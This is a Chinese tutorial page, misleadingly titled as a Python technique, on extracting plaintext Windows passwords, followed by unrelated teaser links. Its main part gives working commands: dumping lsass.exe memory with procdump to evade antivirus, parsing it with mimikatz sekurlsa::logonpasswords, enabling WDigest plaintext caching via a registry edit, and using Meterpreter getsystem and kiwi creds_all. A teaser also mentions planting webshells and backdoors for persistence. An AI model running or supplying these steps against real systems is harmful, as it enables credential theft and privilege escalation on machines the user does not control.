python简单直接获取windows明文密码操作技巧
目录
- 01、Procdump+Mimikatz
- 02、Window 2012 R2抓取密码
- 03、MSF kiwi模块
01、Procdump+Mimikatz
利用procdump+Mimikatz 绕过杀软获取Windows明文密码。
(1)工具准备:
ProcDump:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:
https://github.com/gentilkiwi/mimikatz/
(2)Windows Server 2008 R2提取明文密码
在目标机器上生成存储文件:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt
如图:成功从内存中提取明文密码。
02、Window 2012 R2抓取密码
在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。
(1)修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(2)用户administrator注销后重新登录,成功抓取到明文信息。
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
03、MSF kiwi模块
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
meterpreter > getuid Server username: BYPASS-E97BA3FC\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
加载kiwi模块:
load kiwi
列举系统中的明文密码:
creds_all
以上就是python简单直接获取windows明文密码操作技巧的详细内容,更多关于python获取windows明文密码的资料请关注我们其它相关文章!
相关推荐
-
Python实现的远程登录windows系统功能示例
本文实例讲述了Python实现的远程登录windows系统功能.分享给大家供大家参考,具体如下: 首先安装wmi 命令: pip install wmi 然后会报错缺少pywin32-219.win-amd64-py2.7.exe包,去下面这个地址下载 http://sourceforge.net/projects/pywin32/files/pywin32/ 寻找适合自己电脑位数和python的包下载安装 下面是远程连接的代码: # -*- coding:utf-8 -*- #! python
-
Python实现密钥密码(加解密)实例详解
密钥密码 ''' 如密钥短语密码为: university -> universty 明文: abcdefghijklmnopqrstuvwxyz 密文:jklmopqwxzuniverstyabcdfgh ''' 构造映射字典 # 构造映射 asc ---> crypt def dic(x): list_x =[] list_z = [] for i in x: list_x.append(ord(i)) for i in range(97,123): if i not in list_x:
-
使用Python实现windows下的抓包与解析
系统环境:windows7,选择windows系统是因为我对自己平时日常机器上的流量比较感兴趣 python环境:python2.7 ,这里不选择python3的原因,是因为接下来要用到的scapy包在python3中安装较于python2要麻烦得多.如果你习惯于用python3,数据包的分析完全可以放在3下面做,因为抓包和分析是两个完全独立的过程. 需要的python包:scapy和dpkt 抓包代码: from scapy.sendrecv import sniff from scapy.u
-
Python使用getpass库读取密码的示例
有这样一个经历,服务器挂掉了,请工程师维护,为了安全,工程师进行核心操作时,直接关掉显示器进行操作,完成后,再打开显示器,进行收尾工作... 密码 这个经历告诉我们: 为了安全,核心的操作是不可见的 在某些情况下,显示器可以忽略... 在Linux系统中,在终端输入密码时,是不显示密码位数的(不回显) 早些年,计算机的数量很少,会出现一个人操作计算机,背后一群人围观,被人看到输入密码的位数,就会导致安全问题,于是,采用不回显密码的方式解决问题(密码不回显,你的手指做几个假动作,别人就很难看到你的
-
Python实现最常见加密方式详解
前言 我们所说的加密方式,都是对二进制编码的格式进行加密的,对应到Python中,则是我们的Bytes. 所以当我们在Python中进行加密操作的时候,要确保我们操作的是Bytes,否则就会报错. 将字符串和Bytes互相转换可以使用encode()和decode()方法.如下所示: # 方法中不传参数则是以默认的utf-8编码进行转换In [1]: '南北'.encode()Out[1]: b'\xe5\x8d\x97\xe5\x8c\x97'In [2]: b'\xe5\x8d\x97\xe
-
python简单直接获取windows明文密码操作技巧
目录 01.Procdump+Mimikatz 02.Window 2012 R2抓取密码 03.MSF kiwi模块 01.Procdump+Mimikatz 利用procdump+Mimikatz 绕过杀软获取Windows明文密码. (1)工具准备: ProcDump: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump mimikatz: https://github.com/gentilkiwi/mimika
-
PowerShell小技巧之获取Windows系统密码Hash
当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大的收获.用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验的管理员查出,不管是早期自己创建进程,进程被干掉就完了,还是注入进程的木马,或者是以服务自启动的木马
-
JS简单实现获取元素的封装操作示例
本文实例讲述了JS简单实现获取元素的封装操作.分享给大家供大家参考,具体如下: JS封装获取元素 js的获取元素: ID:document.getElementById(); class:document.getElementsByName()[]; Tag:document.getElementsByTagName()[] 现在我们要简单的封装这个 1. 函数写法: function $(id){ return document.getElementById(); } 其他类同 使用方法: $
-
python简单实现获取当前时间
说起计算机中的时间,还有一些比较有意思的事,比如我们经常听到的Unix时间戳,UTC时间,格林威治时间等,从表示上来讲他们基本属于同一个东西,因为他们的时间表示都是从1970年.1月.1日开始到现在的秒数,到这有人就有问题了,为毛是从这个时间点开始的呢?因为这天呀发生了一件大事,UNIX操作系统诞生了,这UNIX诞生可有来历,他是一个歪果仁利用老婆孩子外出度假的时间来完成的,我假设大家了解操作系统的复杂性,那么我们预估他老婆要外出几年才能完成UNIX系统的编写?3年?5年? 错,人家老婆就去了一
-
使用Python对IP进行转换的一些操作技巧小结
Python Socket模块中包含一些有用IP转换函数,说明如下: socket.ntohl(x) // 类似于C语言的ntohl(x) 把32位正整数从网络序转换成主机字节序. socket.ntohs(x) // 类似于C语言的ntohs(x) 把16位正整数从网络序转换成主机字节序. socket.htonl(x) // 类似于C语言的htonl(x) 把32位正整数从主机字节序转换成网络序. socket.htons(x) // 类似于C语言的htons(x) 把16位正整数从主机字节
-
Python简单获取网卡名称及其IP地址的方法【基于psutil模块】
本文实例讲述了Python简单获取网卡名称及其IP地址的方法.分享给大家供大家参考,具体如下: windows上想知道网卡和IP地址,可以使用ipconfig命令,在linux上可以使用ifconfig命令,得到输出后,可以解析输出内容,我要介绍的方法更为简单,只需要安装一个名为psutil的第三方库即可 # -*- coding: utf-8 -*- #! python2 import psutil #获取网卡名称和其ip地址,不包括回环 def get_netcard(): netcard_
-
如何获取 Spring heapdump中的明文密码
目录 01.jvisualvm分析 02.jhat命令分析 03.heapdump_tool 敏感信息查询工具 04.Eclipse Memory Analyzer(MAT) Actuator是Spring Boot提供的应用系统监控的开源框架.在攻防场景里经常会遇到Actuator配置不当的情况,攻击者可以直接下载heapdump堆转储文件,然后通过一些工具来分析heapdump文件,从而可进一步获取敏感信息. 01.jvisualvm分析 jvisualvm是jdk自带可视化java监控工具
-
Python实现简单的获取图片爬虫功能示例
本文实例讲述了Python实现简单的获取图片爬虫功能.分享给大家供大家参考,具体如下: 简单Python爬虫,获得网页上的照片 #coding=utf-8 import urllib import re def getHtml(url): page = urllib.urlopen(url) html = page.read() return html def getImg(html): reg = r'src="(.+?\.jpg)" pic_ext' imgre = re.comp
-
JavaScript登录记住密码操作(超简单代码)
废话不多说了,直接给大家贴代码了,具体代码如下所示: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>记住密码</title> </head> <bo
-
Python简单获取自身外网IP的方法
本文实例讲述了Python简单获取自身外网IP的方法.分享给大家供大家参考,具体如下: #encoding=utf-8 #author: walker #date: 2016-03-07 #function: 获取自己的外网IP import requests from bs4 import BeautifulSoup #获取外网IP def GetOuterIP(): url = r'http://www.whereismyip.com/' r = requests.get(url) bTag
随机推荐
- 跟老齐学Python之重回函数
- JavaScript面向对象之体会[总结]
- asp.net 中文字符串提交乱码的解决方法
- asp.net 读取配置文件方法
- php 数据结构之链表队列
- CI框架数据库查询之join用法分析
- XML卷之实战锦囊(2):动态查询
- VBS教程:正则表达式简介 -正则表达式语法
- ionic实现底部分享功能
- win2003的“由于下列错误,Parallel port driver 服务启动失败”的解决方法
- 在线实时开通FTP&WEB
- C++结构体struct和类class区别详解
- 浅谈Hibernate n+1问题
- AngularJS实现的锚点楼层跳转功能示例
- mysql授权、启动、启动服务常用命令
- 基于Django用户认证系统详解
- 详解Vue源码中一些util函数
- Mabatis错误提示Parameter index out of range的处理方法
- Vue2.0实现组件之间数据交互和通信操作示例
- layui使用数据表格实现购物车功能